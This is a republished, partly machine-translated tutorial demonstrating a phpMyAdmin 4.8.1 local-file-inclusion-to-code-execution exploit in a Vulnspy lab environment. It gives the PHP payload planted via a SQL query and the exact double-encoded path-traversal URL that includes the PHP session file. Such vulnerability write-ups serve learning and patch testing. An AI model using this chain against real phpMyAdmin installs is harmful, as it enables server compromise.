PhpMyAdmin 4.8.x local file contains exploit

Source: Internet
Author: User
Tags session id sessions phpmyadmin

PhpMyAdmin 4.8.x local file contains exploit

Today CHAMD5 Security team exposes a phpMyAdmin in the latest version of the local file contains vulnerability: phpmyadmin4.8.1 background Getshell. The exploit does not require a root account and can be exploited only by logging in to PhpMyAdmin.

In this article we will use Vulnspy's online phpMyAdmin environment to demonstrate the exploits of this vulnerability.

Vulnspy Online phpMyAdmin Environment address: HTTP://WWW.VULNSPY.COM/PHPMYADMIN-4.8.1/

Vulnerability Details

Refer to the article published by the CHAMD5 security team: phpmyadmin4.8.1 backstage Getshell

Exploit exploits

Because the original text 包含数据库文件 may not be available due to file permissions or insufficient account permissions, here we will use another way to use the file contains a vulnerability, that is, the session file.

1. Enter Vulnspy online phpMyAdmin environment address, click Start to Hack, jump to Vsplate

2. After waiting for the load setting, click the GO button to open the experiment

3. After the experiment is created, click on the demo address to enter the experiment

4. Use account root, password Toor login phpMyAdmin

5. Click the button in the top navigation bar SQL to execute the SQL query

select ‘<?php phpinfo();exit;?>‘

6. Get your session ID

Your SESSION ID is the item in the Cookie phpMyAdmin .

This corresponds to the session file /var/lib/php/sessions/sess_你的SESSION ID .

7. Include session file to successfully exploit this vulnerability

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

GitHub Source

https://github.com/vulnspy/phpmyadmin-4.8.1

Reference

"Starter" phpmyadmin4.8.1 backstage Getshell
PhpMyAdmin 4.8.x LFI to RCE (Authorization Required)-https://blog.vulnspy.com/2018/06/21/ phpmyadmin-4-8-x-authorited-cli-to-rce/

PhpMyAdmin 4.8.x local file contains exploit

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.